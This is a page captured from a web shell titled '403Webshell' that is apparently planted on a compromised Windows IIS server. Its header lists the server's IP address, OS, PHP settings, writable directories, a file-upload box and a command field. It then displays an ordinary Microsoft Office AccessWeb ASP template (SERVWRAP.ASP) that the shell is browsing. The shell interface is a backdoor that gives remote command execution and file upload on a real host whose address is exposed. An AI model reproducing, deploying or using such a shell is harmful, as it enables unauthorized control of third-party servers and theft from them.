403Webshell
Server IP : 195.130.67.5  /  Your IP : 216.73.217.154
Web Server : Microsoft-IIS/10.0
System : Windows NT WEBSERVER1 10.0 build 17763 (Windows Server 2016) i586
User : IUSR ( 0)
PHP Version : 7.4.19
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Program Files (x86)/Microsoft Office/Office12/AccessWeb/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /Program Files (x86)/Microsoft Office/Office12/AccessWeb/SERVWRAP.ASP
<%
Set objData = CreateDOM
objData.async = false

if (|0) then
	Set objDataXMLHTTP = Server.CreateObject("Microsoft.XMLHTTP")
	objDataXMLHTTP.open "GET", "|1", false 
	objDataXMLHTTP.setRequestHeader "Content-Type", "text/xml"
	objDataXMLHTTP.send
	objData.load(objDataXMLHTTP.responseBody)
else
	objData.load(Server.MapPath("|2"))
end if

Set objStyle = CreateDOM
objStyle.async = false
objStyle.load(Server.MapPath("|3"))
Session.CodePage = 65001

Response.ContentType = "text/html"
Response.Write objData.transformNode(objStyle)

Function CreateDOM()
	On Error Resume Next
	Dim tmpDOM

	Set tmpDOM = Nothing
	Set tmpDOM = Server.CreateObject("MSXML2.DOMDocument.5.0")
	If tmpDOM Is Nothing Then
		Set tmpDOM = Server.CreateObject("MSXML2.DOMDocument.4.0")
	End If
	If tmpDOM Is Nothing Then
		Set tmpDOM = Server.CreateObject("MSXML.DOMDocument")
	End If
	
	Set CreateDOM = tmpDOM
End Function
%>

Youez - 2016 - github.com/yon3zu
LinuXploit